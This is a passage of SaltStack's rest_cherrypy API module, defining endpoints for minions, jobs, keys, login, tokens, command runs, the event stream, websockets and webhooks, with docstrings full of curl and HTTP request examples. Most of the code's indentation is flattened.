Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = {'client': 'runner'}
if jid:
lowstate.update({'fun': 'jobs.list_job', 'jid': jid})
else:
lowstate.update({'fun': 'jobs.list_jobs'})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns:
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>` function.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
if six.PY3:
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, BytesIO(pub_key))
tarball.addfile(priv_key_file, BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = len(fileobj.getvalue())
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if token['eauth'] == 'django' and '^model' in eauth:
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
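# Illustrative sketch only (not part of this module): one way a Python client could
# drive the session flow documented above using the ``requests`` library. The URL,
# credentials, and the ``auto`` eauth backend are assumptions for the example, and
# ``verify=False`` mirrors the ``-k`` flag used in the curl examples.
def _example_login_and_ping(api_url='https://localhost:8000'):
    import requests
    session = requests.Session()
    # POST credentials to /login; the returned session cookie is paired with a
    # Salt eauth token on the server side.
    session.post(api_url + '/login',
                 json={'username': 'saltdev', 'password': 'saltdev', 'eauth': 'auto'},
                 verify=False)
    # Reuse the cookie to send lowstate chunks to the root URL, as in the curl
    # example in LowDataAdapter.POST above.
    resp = session.post(api_url,
                        json=[{'client': 'local', 'tgt': '*', 'fun': 'test.ping'}],
                        headers={'Accept': 'application/json'},
                        verify=False)
    return resp.json()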
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Token(LowDataAdapter):
'''
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
'''
@cherrypy.config(**{'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
'''
for creds in cherrypy.request.lowstate:
try:
creds.update({
'client': 'runner',
'fun': 'auth.mk_token',
'kwarg': {
'username': creds['username'],
'password': creds['password'],
'eauth': creds['eauth'],
},
})
except KeyError:
raise cherrypy.HTTPError(400,
'Require "username", "password", and "eauth" params')
return list(self.exec_lowstate())
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization; Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: text
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
yield str('retry: 400\n') # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield str('tag: {0}\n').format(data.get('tag', '')) # future lint: disable=blacklisted-function
yield str('data: {0}\n\n').format(salt.utils.json.dumps(data)) # future lint: disable=blacklisted-function
return listen()
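# Illustrative sketch only: consuming the SSE stream above from Python rather than
# curl or JavaScript. The URL and token value are assumptions for the example;
# ``stream=True`` keeps requests from buffering the never-ending response, much like
# curl's ``-N`` flag.
def _example_follow_events(api_url='http://localhost:8000', token='ecd589e4'):
    import json
    import requests
    resp = requests.get(api_url + '/events', params={'token': token}, stream=True)
    for line in resp.iter_lines(decode_unicode=True):
        # Each event arrives as a "tag: ..." line followed by a "data: <json>" line,
        # with a blank line between records.
        if line and line.startswith('data: '):
            event = json.loads(line[len('data: '):])
            print(event['tag'], event['data'])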
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
The examples above show how to establish a websocket connection to Salt and
activate real-time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
str('data: {0}\n\n').format(salt.utils.json.dumps(data)), # future lint: disable=blacklisted-function
False
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication; however, not all external services can
be configured to authenticate. For this reason, authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
